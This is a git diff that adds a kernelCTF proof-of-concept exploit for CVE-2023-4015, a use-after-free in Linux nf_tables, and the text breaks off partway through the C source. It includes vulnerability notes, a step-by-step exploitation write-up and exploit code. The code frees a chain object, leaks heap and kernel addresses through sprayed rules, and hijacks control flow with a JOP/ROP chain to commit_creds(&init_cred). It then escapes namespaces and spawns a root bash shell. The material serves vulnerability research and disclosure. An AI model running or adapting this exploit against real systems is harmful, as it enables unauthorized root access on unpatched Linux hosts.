diff --git a/pocs/linux/kernelctf/CVE-2023-4015_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-4015_cos/docs/exploit.md
new file mode 100644
index 00000000..76834890
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-4015_cos/docs/exploit.md
@@ -0,0 +1,96 @@
+# CVE-2023-4015
+
+This documentation briefly describes the exploit. For more technical details, please look at the exploit source code.
+
+In order to trigger the vulnerability, `CAP_NET_ADMIN` is required. We can use a namespace sandbox to satisfy this requirement.
+Also, so that our kernel heap allocations do not span multiple per-CPU slabs, we pin our process to a single CPU.
+
+## Triggering the vulnerability
+
+We aim to free an `nft_chain` object that resides in the `kmalloc-128` cache.
+
+- Batch 1
+  - Create a table `t`
+  - Create a chain `c1`
+  - Create a chain `c2` hosting a rule `r2` that has an immediate expression `e2` which binds to `c1`
+    + `c1->use == 1`
+- Batch 2
+  - Create a chain `c3` hosting a rule `r3` that has an immediate expression `e3` which binds to `c1`
+    + `c3` should have the `NFT_CHAIN_BINDING` flag
+    + `c1->use = 2`
+  - Create a chain `c4` hosting a rule `r4` that has an immediate expression `e4` which binds to `c3`
+    + However, we will not allow the rule creation to succeed: we add another immediate expression, which binds to a non-existent chain
+    + At this point, `nft_rule_expr_deactivate` will be called on `r4` with `phase = NFT_TRANS_PREPARE_ERROR`
+    + `nft_immediate_deactivate` will be called on `e4`
+    + Since `c3` has the `NFT_CHAIN_BINDING` flag, `nft_rule_expr_deactivate` will be called on `r3`, which will also deactivate `e3`
+    + `c1->use = 1` because `c1` is bound to `e3`
+  - Because the batch failed, transaction rollback will be executed with `phase = NFT_TRANS_ABORT`
+    + `c3`, `r3`, `e3` will be deactivated again
+    + `c1->use = 0`
+- Batch 3
+  - Because `c1->use = 0`, we can delete chain `c1`
+
+After this, we have a dangling reference in `e2` to the freed chain `c1`.
+The naming convention here is for demonstration purposes only. In the exploit it will be different.
+We will also create a `spray` chain in order to spray the heap using `nft_rule` objects later (mostly to avoid accidentally reclaiming the freed chunk when creating a new chain).
+
+## Leak kernel heap address
+
+When dumping an immediate expression bound to another chain, we get that chain's name.
+When the chain is freed, the buffer containing its name is also freed, but the pointer to the name is not cleared.
+If we reclaim the freed name buffer, but not the freed chain, we can leak data from the start of the reclaimed object up to the first NULL byte.
+With chunk size 192 (`kmalloc-192`), it is less likely that we will get a NULL byte in the address.
+So when creating the chain `c1`, we set its name to be 129-192 bytes long (including the terminating NULL character).
+
+We will use `nft_rule` as the spraying object to reclaim the freed name chunk because:
+
+- It is an elastic object so we can attack many caches
+- The elastic portion consists of a flattened expression array (up to 128 expressions) and arbitrary user data (up to 255 bytes)
+- The first field is `list_head` so we can leak the heap addresses of the next rule and the previous rule
+
+We create a lot of rules with some user data so that the total length of the `nft_rule` struct is in the range 129-192 bytes.
+After spraying, we request a dump of `r2`, which dumps `e2`, and hopefully we get the heap address of an `nft_rule` object.
+If the leak fails, we try again.
+We will also be able to leak the `handle` of the rule object that reclaimed the freed name chunk.
+It will be used in a later stage to free exactly the rule whose heap address we leaked.
+
+We will also add a `nft_notrack` expression to the rule so there will be a kernel pointer inside, which we will leak in the next stage once we get the heap leak.
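The size arithmetic behind the rule spray can be checked with a small standalone sketch. It is an illustration only and not part of the exploit: the sizes (a 0x18-byte rule header, an 8-byte `ops` pointer for the `notrack` expression, a 1-byte `nft_userdata.len`) are taken from the struct definitions in `exploit.c` and are assumed to match the target kernel, and `kmalloc_bucket`, `sprayed_rule_size`, and `check_spray_sizes` are hypothetical helpers that model only a few general-purpose cache sizes.

```c
#include <assert.h>
#include <stddef.h>

/* Sizes taken from the struct definitions in exploit.c (assumed to match the kernel). */
enum {
    RULE_HDR_SIZE     = 0x18, /* list_head (16 bytes) + 8 bytes of bitfields */
    NOTRACK_EXPR_SIZE = 0x08, /* a notrack expression holds only the ops pointer */
    UDATA_HDR_SIZE    = 0x01  /* nft_userdata.len */
};

/* Hypothetical helper: smallest general-purpose kmalloc cache that fits `size`.
 * Only the buckets relevant to this write-up are modelled. */
size_t kmalloc_bucket(size_t size) {
    static const size_t buckets[] = {8, 16, 32, 64, 96, 128, 192, 256, 512, 1024};
    for (size_t i = 0; i < sizeof(buckets) / sizeof(buckets[0]); ++i)
        if (size <= buckets[i])
            return buckets[i];
    return 0; /* larger sizes are out of scope for this sketch */
}

/* Total allocation size of a sprayed rule carrying `udata_len` bytes of user data. */
size_t sprayed_rule_size(size_t udata_len) {
    return RULE_HDR_SIZE + NOTRACK_EXPR_SIZE + UDATA_HDR_SIZE + udata_len;
}

/* Mirrors the sizes chosen in leak_heap() and for free_chain_name. */
void check_spray_sizes(void) {
    size_t udata_len = 191 - NOTRACK_EXPR_SIZE - RULE_HDR_SIZE; /* 159 bytes */
    assert(sprayed_rule_size(udata_len) == 192);
    assert(kmalloc_bucket(sprayed_rule_size(udata_len)) == 192);
    assert(kmalloc_bucket(160) == 192); /* chain name buffer, terminator included */
}
```

Both the sprayed rule and the 160-byte chain name land in the same cache under these assumptions, which is what lets a rule reclaim the freed name buffer.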
+The in-memory structure layout of the sprayed rules looks like this (the first 0x18 bytes are rule metadata):
+
+| Offset | Field | Value |
+|--------|-------|-------|
+| ... | | |
+| 0x18 | expression | `nft_notrack_ops` |
+| 0x20 | `nft_userdata.len` | x |
+| 0x21 | `nft_userdata.data` | any |
+| ... | | |
+| 0xbf | `nft_userdata.data` | any |
+
+## Leak kernel base address
+
+Now that we have a heap leak and know that a kernel address sits inside that chunk, we leak it by reclaiming the freed chain with a fake chain whose `name` points into the leaked heap region (reminder: the freed `nft_chain` is in the `kmalloc-128` cache).
+This time we will spray using the `userdata` of `nft_table`. We can store at most 256 bytes of arbitrary data.
+We create multiple `nft_table` objects with different names, each carrying 128 bytes of `userdata` laid out as follows:
+
+| Offset | `nft_chain` field | Value | Remarks |
+|--------|-------------------|-------|---------|
+| 0x0 | `blob_gen_0`, `blob_gen_1` (as named in `exploit.c`) | any | |
+| 0x10 | `rules.next` | heap leak | for next stage |
+| 0x18 | `rules.prev` | heap leak | for next stage |
+| ... | | | |
+| 0x54 | `flags` | `NFT_CHAIN_BINDING` | for next stage |
+| 0x58 | `name` | heap leak + `sizeof(struct nft_rule)` | where we put `nft_notrack_ops` in the sprayed rule above |
+| ... | | | |
+
+After spraying, we request a dump of `r2`, which dumps `e2`, and hopefully we get the address of `nft_notrack_ops`.
+
+## RIP control and return to userspace
+
+Since we have the `handle` of the rule whose address was leaked, we delete that rule.
+Then, we spray a fake `nft_rule` that also acts as a ROP chain. Remember that the deleted rule resided in the `kmalloc-192` cache.
+We set `dlen` of the fake rule to 1 to pass the expression loop check.
+We craft a fake expression whose `ops` points into the leaked heap chunk, positioned so that `ops->deactivate` lines up with a JOP gadget.
+Following that, we build a ROP chain that calls `commit_creds(&init_cred)` and `switch_task_namespaces(find_task_by_vpid(getpid()), &init_nsproxy)`, then returns to userspace.
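The offsets inside the 192-byte fake rule can be tabulated as a small self-check. This is a sketch derived from `spray_krop()` in `exploit.c`, not code taken from it: the slot names and helper functions are labels invented here for illustration, and it assumes `sizeof(struct nft_rule) == 0x18`, that `deactivate` sits at offset `0x28` of `nft_expr_ops` (as the exploit's comment states), and that `rsi` holds the fake expression pointer when `deactivate` is invoked.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

enum {
    RULE_HDR_SIZE      = 0x18, /* sizeof(struct nft_rule) as declared in exploit.c */
    OPS_DEACTIVATE_OFF = 0x28, /* offset of deactivate in nft_expr_ops, per the exploit's comment */
    PIVOT_PTR_OFF      = 0x0f, /* the JOP gadget jumps through [rsi + 0xf] */
    FAKE_RULE_SIZE     = 192   /* size of the reclaimed kmalloc-192 chunk */
};

/* Illustrative labels for the 8-byte slots that follow fake_expr->ops. */
enum rop_slot {
    SLOT_SKIPPED_A, SLOT_SKIPPED_B,  /* skipped by the chain; the pivot gadget pointer overlaps them */
    SLOT_POP_RDI_1, SLOT_INIT_CRED, SLOT_COMMIT_CREDS,
    SLOT_POP_RDI_2, SLOT_PID, SLOT_FIND_TASK_BY_VPID, SLOT_MOV_RDI_RAX,
    SLOT_POP_RSI, SLOT_INIT_NSPROXY, SLOT_SWITCH_TASK_NAMESPACES,
    SLOT_KPTI_TRAMPOLINE,
    SLOT_JOP_GADGET,                 /* stored in an otherwise unused slot */
    SLOT_UNUSED,
    SLOT_USER_RIP, SLOT_USER_CS, SLOT_USER_RFLAGS, SLOT_USER_SP, SLOT_USER_SS,
    SLOT_COUNT
};

/* Byte offset of a slot from the start of the fake rule. */
size_t slot_offset(enum rop_slot s) {
    return RULE_HDR_SIZE + sizeof(uint64_t) /* fake_expr->ops */ + (size_t)s * sizeof(uint64_t);
}

/* Value for fake_expr->ops so that ops->deactivate reads the JOP gadget slot. */
uint64_t fake_ops_pointer(uint64_t rule_addr) {
    return rule_addr + slot_offset(SLOT_JOP_GADGET) - OPS_DEACTIVATE_OFF;
}

/* Offset (from the rule start) where the stack pivot gadget pointer is written. */
size_t pivot_pointer_offset(void) {
    return RULE_HDR_SIZE + PIVOT_PTR_OFF;
}

void check_fake_rule_layout(void) {
    assert(slot_offset(SLOT_POP_RDI_1) == 0x30);          /* first real ROP entry */
    assert(slot_offset(SLOT_JOP_GADGET) == 0x88);         /* matches "heap + 0x88" */
    assert(slot_offset(SLOT_COUNT) == FAKE_RULE_SIZE);    /* chain fills the chunk exactly */
    assert(pivot_pointer_offset() == 0x27);
    assert(fake_ops_pointer(0x1000) == 0x1060);
}
```

With a leaked rule address `heap`, `fake_ops_pointer(heap)` reproduces the `heap + 0x88 - 0x28` expression used in `spray_krop()`, and the final assertion on `SLOT_COUNT` shows why the payload needs the whole `kmalloc-192` chunk.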
+
+After spraying, we delete the rule `r2`, which calls `nft_rule_expr_deactivate` on `e2`. Since we prepared a fake rule list for the reclaimed fake chain and set its flags to `NFT_CHAIN_BINDING`, the fake rule will be deactivated and the fake expression's `deactivate` routine will be called, which triggers the JOP gadget and then the ROP chain.
+
+Back in userspace, we use `setns` to escape from the jail, then spawn a root shell using `execve`.
diff --git a/pocs/linux/kernelctf/CVE-2023-4015_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-4015_cos/docs/vulnerability.md
new file mode 100644
index 00000000..655f3d5e
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-4015_cos/docs/vulnerability.md
@@ -0,0 +1,48 @@
+# CVE-2023-4015
+
+In `nft_immediate_deactivate`, if the immediate expression has `dreg == NFT_REG_VERDICT` and is bound to a chain with the `NFT_CHAIN_BINDING` flag, it will call `nft_rule_expr_deactivate` on all rules under the bound chain.
+This will in turn call the `deactivate` method on all expressions belonging to each rule. If one of them is an immediate expression bound to a chain, it goes through the same deactivation routine.
+Finally, each time this function is called with a transaction phase other than `NFT_TRANS_COMMIT`, `nft_data_release` decrements the bound chain's `use` counter by `1`.
+
+A problem arises if this function is called twice on the same expression within a single transaction, in any phase other than `NFT_TRANS_COMMIT`: the bound chain's `use` is then decreased by `2`.
+If the chain has 2 objects holding references to it, its `use` drops to `0`, which allows the chain to be deleted and leaves a dangling reference.
+
+Before commit [26b5a5712eb85e253724e56a54c17f8519bd8e4e](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=26b5a5712eb85e253724e56a54c17f8519bd8e4e), there were no vulnerable code paths.
+However, that commit introduced the `NFT_TRANS_PREPARE_ERROR` phase, which opened up a way to reach the UAF condition: when an error occurs while creating a rule, `deactivate` is called on the expressions that were already created successfully, and these may be immediate expressions bound to a chain created in the same batch.
+The chain in the batch will then be deactivated again when the transaction is rolled back.
+A detailed demonstration of the UAF can be found in exploit.md.
+
+## Requirements to trigger the vulnerability
+
+|Capabilities|Kernel configuration|Are user namespaces needed?|
+|---|---|---|
+|CAP_NET_ADMIN|CONFIG_NF_TABLES|Yes|
+
+## Commit which introduced the vulnerability
+
+https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=26b5a5712eb85e253724e56a54c17f8519bd8e4e
+
+## Commit which fixed the vulnerability
+
+https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0a771f7b266b02d262900c75f1e175c7fe76fec2
+
+## Affected kernel versions
+
+- 5.10.188 - 5.10.189
+- 5.15.119 - 5.15.123
+- 6.1.36 - 6.1.42
+- 6.3.10 - 6.3.13
+- 6.4 - 6.4.7
+- 6.5-rc1 - 6.5-rc3
+
+## Affected component, subsystem
+
+netfilter/nf_tables
+
+## Cause
+
+Use-after-free
+
+## Which syscalls or syscall parameters are needed to be blocked to prevent triggering the vulnerability?
+
+Disable the ability to communicate with the nf_tables subsystem from an unprivileged user namespace, or prevent the creation of unprivileged user namespaces.
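The double decrement described at the top of vulnerability.md can be modelled with a toy program. This is not kernel code: `toy_chain`, `toy_expr`, `toy_deactivate`, and `toy_scenario` are hypothetical stand-ins that mimic only the reference counting, under the simplifying assumption that every non-commit deactivation of an immediate expression recurses into the rule of a bound chain and then drops the target chain's `use` by one.

```c
#include <assert.h>
#include <stddef.h>

enum toy_phase { TOY_COMMIT, TOY_PREPARE_ERROR, TOY_ABORT };

struct toy_expr;

struct toy_chain {
    int use;               /* reference counter, like nft_chain.use */
    int binding;           /* nonzero if the chain has NFT_CHAIN_BINDING */
    struct toy_expr *expr; /* the one immediate expression hosted by the chain, or NULL */
};

struct toy_expr {
    struct toy_chain *target; /* chain this immediate expression is bound to */
};

/* Simplified model of nft_immediate_deactivate as described above. */
void toy_deactivate(struct toy_expr *e, enum toy_phase phase) {
    struct toy_chain *c = e->target;
    if (c->binding && c->expr != NULL)
        toy_deactivate(c->expr, phase); /* deactivate rules under the bound chain */
    if (phase != TOY_COMMIT)
        c->use--;                       /* reference dropped on every non-commit call */
}

/* Replays batch 2 from exploit.md and returns the final c1->use. */
int toy_scenario(void) {
    struct toy_chain c1 = { .use = 2, .binding = 0, .expr = NULL }; /* referenced by e2 and e3 */
    struct toy_expr e3 = { .target = &c1 };
    struct toy_chain c3 = { .use = 1, .binding = 1, .expr = &e3 };  /* referenced by e4 */
    struct toy_expr e4 = { .target = &c3 };

    toy_deactivate(&e4, TOY_PREPARE_ERROR); /* failed rule r4: also deactivates e3 */
    toy_deactivate(&e3, TOY_ABORT);         /* rollback of r3: e3 deactivated a second time */
    return c1.use;                          /* e2 still points at c1 */
}
```

In this model `toy_scenario()` returns `0` even though `e2` still references `c1`, which is the condition that lets batch 3 delete the chain.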
diff --git a/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/.gitignore b/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/.gitignore
new file mode 100644
index 00000000..3f9cfafd
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/.gitignore
@@ -0,0 +1 @@
+deps
diff --git a/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/Makefile b/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/Makefile
new file mode 100644
index 00000000..c2ce1e8a
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/Makefile
@@ -0,0 +1,16 @@
+CFLAGS=-D_GNU_SOURCE -std=gnu17 -Wall -O0 -static -I./deps/include
+LIBS=deps/lib/libnftnl.a deps/lib/libmnl.a
+
+.PHONY: exploit
+exploit:
+	$(CC) $(CFLAGS) exploit.c -o exploit $(LIBS)
+
+prerequisites:
+	mkdir -p deps
+	wget -O libmnl-1.0.5.tar.bz2 https://www.netfilter.org/pub/libmnl/libmnl-1.0.5.tar.bz2
+	tar -xf libmnl-1.0.5.tar.bz2
+	cd libmnl-1.0.5 && ./configure --prefix=$(PWD)/deps --enable-static=yes --enable-shared=no && make install
+	wget -O libnftnl-1.2.8.tar.xz https://www.netfilter.org/pub/libnftnl/libnftnl-1.2.8.tar.xz
+	tar -xf libnftnl-1.2.8.tar.xz
+	cd libnftnl-1.2.8 && LIBMNL_CFLAGS=-I$(PWD)/deps/include LIBMNL_LIBS=$(PWD)/deps/lib/libmnl.a ./configure --prefix=$(PWD)/deps --enable-static=yes --enable-shared=no && make install
+	rm -rf libmnl* libnftnl*
diff --git a/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/exploit b/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/exploit
new file mode 100755
index 00000000..d5f87476
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/exploit differ
diff --git a/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/exploit.c b/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/exploit.c
new file mode 100644
index 00000000..18c70c60
---
/dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4015_cos/exploit/cos-105-17412.156.23/exploit.c @@ -0,0 +1,654 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define INFO(fmt, ...) fprintf(stderr, "[*] " fmt "\n", ##__VA_ARGS__) +#define WARN(fmt, ...) fprintf(stderr, "[!] " fmt "\n", ##__VA_ARGS__) +#define ERROR(msg) fprintf(stderr, "[-] %s:%d: %s: %s\n", __func__, __LINE__, msg, strerror(errno)) + +#define SPRAY_BATCH_SIZE 64 +#define SPRAY_BATCHES 16 + +#define NFT_NOTRACK_OPS 0x1ac8cc0 // nft_notrack_ops +#define INIT_NSPROXY 0x2461f40 +#define COMMIT_CREDS 0x110980 +#define FIND_TASK_BY_VPID 0x1077c0 +#define SWITCH_TASK_NAMESPACES 0x10efa0 +#define KPTI_TRAMPOLINE 0x1201090 + 0x36 // swapgs_restore_regs_and_return_to_usermode + offset +#define INIT_CRED 0x2462180 + +#define PUSH_RSI_JMP_QWORD_PTR_RSI_F 0xc6b728 // push rsi ; jmp qword ptr [rsi + 0xf] +#define POP_RSP_R13_R14_R15_RET 0x67f4e // pop rsp ; pop r13 ; pop r14 ; pop r15 ; jmp 0xffffffff82404200 -> ret +#define POP_RDI_RET 0x5dd5c0 // pop rdi ; ret +#define POP_RSI_RET 0x57f44e // pop rsi ; ret +#define POP_RDX_RET 0x57f34e // pop rdx ; ret +#define MOV_RDI_RAX_CMP_RDI_RDX_JNE_XOR_EAX_EAX_RET 0x7deb7e // mov rdi, rax ; cmp rdi, rdx ; jne 0xffffffff817deb75 ; xor eax, eax ; jmp 0xffffffff82404200 -> ret + +struct list_head { + struct list_head *next, *prev; +}; + +struct rhash_head { + struct rhash_head *next; +}; + +struct rhlist_head { + struct rhash_head rhead; + struct rhlist_head *next; +}; + +struct msg_msgseg { + struct msg_msgseg *next; +}; + +struct nft_expr { + struct nft_expr_ops *ops; + unsigned char data[] + __attribute__((aligned(__alignof__(uint64_t)))); +}; + +struct nft_rule { + struct list_head list; + uint64_t handle:42, + genmask:2, + dlen:12, + udata:1; + unsigned char data[] + __attribute__((aligned(__alignof__(struct nft_expr)))); +}; + +struct nft_rule_dp { + uint64_t is_last:1, + dlen:12, 
+ handle:42; /* for tracing */ + unsigned char data[] + __attribute__((aligned(__alignof__(struct nft_expr)))); +}; + +struct nft_rule_blob { + unsigned long size; + unsigned char data[] + __attribute__((aligned(__alignof__(struct nft_rule_dp)))); +}; + +struct nft_chain { + struct nft_rule_blob *blob_gen_0; + struct nft_rule_blob *blob_gen_1; + struct list_head rules; + struct list_head list; + struct rhlist_head rhlhead; + struct nft_table *table; + uint64_t handle; + uint32_t use; + uint8_t flags:5, + bound:1, + genmask:2; + char *name; + uint16_t udlen; + uint8_t *udata; + + /* Only used during control plane commit phase: */ + struct nft_rule_blob *blob_next; +}; + +struct nft_userdata { + uint8_t len; + unsigned char data[]; +}; + +typedef struct mnl_socket *sock; +typedef struct mnl_nlmsg_batch *batch; +typedef struct nlmsghdr *nlmsghdr; +typedef struct nftnl_table *table; +typedef struct nftnl_chain *chain; +typedef struct nftnl_rule *rule; +typedef struct nftnl_expr *expr; + +static sock nlsock; +static const uint16_t family = NFPROTO_IPV4; +static uint32_t seq = 1, rseq = 1, table_counter; +static char current_table_name[16], free_chain_name[160]; // to make the freed chain name fall in kmalloc-192 +static uint64_t heap, vmlinux, rule_handle; +static uint64_t user_cs, user_ss, user_rflags, user_sp; + +static void save_state() { + __asm__( + ".intel_syntax noprefix;" + "mov user_cs, cs;" + "mov user_ss, ss;" + "mov user_sp, rsp;" + "pushf;" + "pop user_rflags;" + ".att_syntax;" + ); +} + +void monke() { + INFO("Return to monke"); + + setns(open("/proc/1/ns/mnt", O_RDONLY), 0); + setns(open("/proc/1/ns/pid", O_RDONLY), 0); + setns(open("/proc/1/ns/net", O_RDONLY), 0); + + char *args[] = {"/bin/bash", "-i", NULL}; + execve(args[0], args, NULL); +} + +static table make_table(const char *name, const void *udata, uint32_t udlen) { + table t = nftnl_table_alloc(); + if (t == NULL) + return NULL; + + nftnl_table_set_u32(t, NFTNL_TABLE_FAMILY, family); + 
nftnl_table_set_str(t, NFTNL_TABLE_NAME, name); + + if (udata != NULL && udlen > 0) + nftnl_table_set_data(t, NFTNL_TABLE_USERDATA, udata, udlen); + + return t; +} + +static chain make_chain(const char *table, const char *name, uint32_t flags) { + chain c = nftnl_chain_alloc(); + if (c == NULL) + return NULL; + + nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table); + nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, name); + nftnl_chain_set_u32(c, NFTNL_CHAIN_FLAGS, flags); + + return c; +} + +static rule make_rule(const char *table, const char *chain, expr *exprs, size_t num_exprs, const void *udata, uint32_t udlen, uint64_t handle) { + rule r = nftnl_rule_alloc(); + if (r == NULL) + return NULL; + + nftnl_rule_set_u32(r, NFTNL_RULE_FAMILY, family); + nftnl_rule_set_str(r, NFTNL_RULE_TABLE, table); + nftnl_rule_set_str(r, NFTNL_RULE_CHAIN, chain); + + for (int i = 0; i < num_exprs; ++i) + nftnl_rule_add_expr(r, exprs[i]); + + if (udlen > 0) + nftnl_rule_set_data(r, NFTNL_RULE_USERDATA, udata, udlen); + + if (handle > 0) + nftnl_rule_set_u64(r, NFTNL_RULE_HANDLE, handle); + + return r; +} + +static expr make_immediate_jump_expr(const char *target_chain) { + expr e = nftnl_expr_alloc("immediate"); + if (e == NULL) + return NULL; + + nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT); + nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_VERDICT, NFT_JUMP); + nftnl_expr_set_str(e, NFTNL_EXPR_IMM_CHAIN, target_chain); + + return e; +} + +static expr make_notrack_expr() { + return nftnl_expr_alloc("notrack"); +} + +static batch batch_init(size_t size) { + void *buf = malloc(size); + batch b = mnl_nlmsg_batch_start(buf, size); + nftnl_batch_begin(mnl_nlmsg_batch_current(b), seq++); + mnl_nlmsg_batch_next(b); + rseq = seq; + return b; +} + +static void batch_end(batch b) { + nftnl_batch_end(mnl_nlmsg_batch_current(b), seq); + mnl_nlmsg_batch_next(b); +} + +static ssize_t batch_send(batch b, sock s) { + return mnl_socket_sendto(s, mnl_nlmsg_batch_head(b), mnl_nlmsg_batch_size(b)); +} + 
+static void batch_free(batch b) { + free(mnl_nlmsg_batch_head(b)); + mnl_nlmsg_batch_stop(b); +} + +static void batch_new_table(batch b, table t) { + nlmsghdr hdr = nftnl_nlmsg_build_hdr((char *)mnl_nlmsg_batch_current(b), NFT_MSG_NEWTABLE, family, NLM_F_ACK | NLM_F_CREATE | NLM_F_APPEND, seq++); + nftnl_table_nlmsg_build_payload(hdr, t); + mnl_nlmsg_batch_next(b); +} + +static void batch_new_chain(batch b, chain c) { + nlmsghdr hdr = nftnl_nlmsg_build_hdr((char *)mnl_nlmsg_batch_current(b), NFT_MSG_NEWCHAIN, family, NLM_F_ACK | NLM_F_CREATE | NLM_F_APPEND, seq++); + nftnl_chain_nlmsg_build_payload(hdr, c); + mnl_nlmsg_batch_next(b); +} + +static void batch_del_chain(batch b, chain c) { + nlmsghdr hdr = nftnl_nlmsg_build_hdr((char *)mnl_nlmsg_batch_current(b), NFT_MSG_DELCHAIN, family, NLM_F_ACK, seq++); + nftnl_chain_nlmsg_build_payload(hdr, c); + mnl_nlmsg_batch_next(b); +} + +static void batch_new_rule(batch b, rule r) { + nlmsghdr hdr = nftnl_nlmsg_build_hdr((char *)mnl_nlmsg_batch_current(b), NFT_MSG_NEWRULE, family, NLM_F_ACK | NLM_F_CREATE | NLM_F_APPEND, seq++); + nftnl_rule_nlmsg_build_payload(hdr, r); + mnl_nlmsg_batch_next(b); +} + +static void batch_del_rule(batch b, rule r) { + nlmsghdr hdr = nftnl_nlmsg_build_hdr((char *)mnl_nlmsg_batch_current(b), NFT_MSG_DELRULE, family, NLM_F_ACK, seq++); + nftnl_rule_nlmsg_build_payload(hdr, r); + mnl_nlmsg_batch_next(b); +} + +static nlmsghdr dump_rule(rule r, char *buf) { + nlmsghdr hdr = nftnl_nlmsg_build_hdr(buf, NFT_MSG_GETRULE, family, NLM_F_ACK, seq++); + nftnl_rule_nlmsg_build_payload(hdr, r); + return hdr; +} + +static int run_callbacks(sock s, mnl_cb_t cb, void *data) { + // INFO("Start callback: rseq = %d, seq = %d", rseq, seq); + char buf[MNL_SOCKET_BUFFER_SIZE]; + int ret = 0; + while (rseq < seq) { + ret = mnl_socket_recvfrom(s, buf, sizeof(buf)); + if (ret <= 0) + break; + ret = mnl_cb_run(buf, ret, rseq, mnl_socket_get_portid(s), cb, data); + if (ret < 0) + break; + rseq += ret == 0; + } + // 
INFO("End callback: rseq = %d, seq = %d", rseq, seq); + return ret; +} + +static int setup() { + // In order to use nf_tables, we need CAP_NET_ADMIN + INFO("Setting up user namespace"); + + if (unshare(CLONE_NEWUSER | CLONE_NEWNET)) { + ERROR("unshare(CLONE_NEWUSER | CLONE_NEWNET)"); + return -1; + } + + // Pin process to a single CPU to avoid nf_tables allocations to spill over different slabs + INFO("Pinning process to CPU #0"); + + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(0, &set); + if (sched_setaffinity(getpid(), sizeof(set), &set) == -1) { + ERROR("sched_setaffinity"); + return -1; + } + + INFO("Creating netfilter netlink socket"); + if ((nlsock = mnl_socket_open(NETLINK_NETFILTER)) == NULL) { + ERROR("mnl_socket_open(NETLINK_NETFILTER)"); + return -1; + } + + return 0; +} + +static int trigger_uaf() { + INFO("Triggering UAF"); + + sprintf(current_table_name, "%d", table_counter++); + table t = make_table(current_table_name, NULL, 0); + chain c_free = make_chain(current_table_name, free_chain_name, 0); + chain c_spray = make_chain(current_table_name, "spray", 0); + chain c_primitive = make_chain(current_table_name, "primitive", 0); + expr e_primitive = make_immediate_jump_expr(free_chain_name); + rule r_primitive = make_rule(current_table_name, "primitive", &e_primitive, 1, NULL, 0, 0); + + batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); + batch_new_table(b, t); + batch_new_chain(b, c_free); + batch_new_chain(b, c_spray); + batch_new_chain(b, c_primitive); + batch_new_rule(b, r_primitive); + batch_end(b); + if (batch_send(b, nlsock) == -1) { + ERROR("batch_send"); + return -1; + } + batch_free(b); + if (run_callbacks(nlsock, NULL, NULL) < 0) { + ERROR("run_callbacks"); + return -1; + } + + chain c_effect = make_chain(current_table_name, "effect", NFT_CHAIN_BINDING); + expr e_effect = make_immediate_jump_expr(free_chain_name); + rule r_effect = make_rule(current_table_name, "effect", &e_effect, 1, NULL, 0, 0); + chain c_attack = 
make_chain(current_table_name, "attack", 0); + expr e_attack[2]; + e_attack[0] = make_immediate_jump_expr("effect"); + e_attack[1] = make_immediate_jump_expr("some_invalid_chain"); + rule r_attack = make_rule(current_table_name, "attack", e_attack, 2, NULL, 0, 0); + + b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); + batch_new_chain(b, c_effect); + batch_new_rule(b, r_effect); + batch_new_chain(b, c_attack); + batch_new_rule(b, r_attack); + batch_end(b); + if (batch_send(b, nlsock) == -1) { + ERROR("batch_send"); + return -1; + } + batch_free(b); + run_callbacks(nlsock, NULL, NULL); + + b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2); + batch_del_chain(b, c_free); + batch_end(b); + if (batch_send(b, nlsock) == -1) { + ERROR("batch_send"); + return -1; + } + batch_free(b); + if (run_callbacks(nlsock, NULL, NULL) < 0) { + ERROR("run_callbacks"); + return -1; + } + + INFO("Sleeping to wait for the work queue to actually free the chain"); + sleep(1); + + return 0; +} + +static int dump_expr_leak_heap(expr e, void *dat) { + const char *data; + + data = nftnl_expr_get_str(e, NFTNL_EXPR_IMM_CHAIN); + if (strlen(data) < 17) // list + handle + return MNL_CB_OK; + + struct nft_rule *r = (struct nft_rule *)data; + heap = (uint64_t)r->list.next; + rule_handle = (r->handle & 0xffff) + 1; // we got the address of the next rule, handle should be +1 + if ((heap & 0xff) == 0x90 || (heap & 0xff) == 0x10) { // we got leak to spray chain (rules list at offset 0x10 of nft_chain) + heap = (uint64_t)r->list.prev; // get address of a rule instead + rule_handle = (r->handle & 0xffff) - 1; // we got the address of the previous rule, handle should be -1 + } + INFO("heap = 0x%lx, rule_handle = %lu", heap, rule_handle); + + return MNL_CB_OK; +} + +static int dump_expr_leak_vmlinux(expr e, void *dat) { + const char *data; + + data = nftnl_expr_get_str(e, NFTNL_EXPR_IMM_CHAIN); + if (strlen(data) < 8) + return MNL_CB_OK; + + vmlinux = *(uint64_t *)data; + if (vmlinux >= 0xffffffff00000000) { + vmlinux -= 
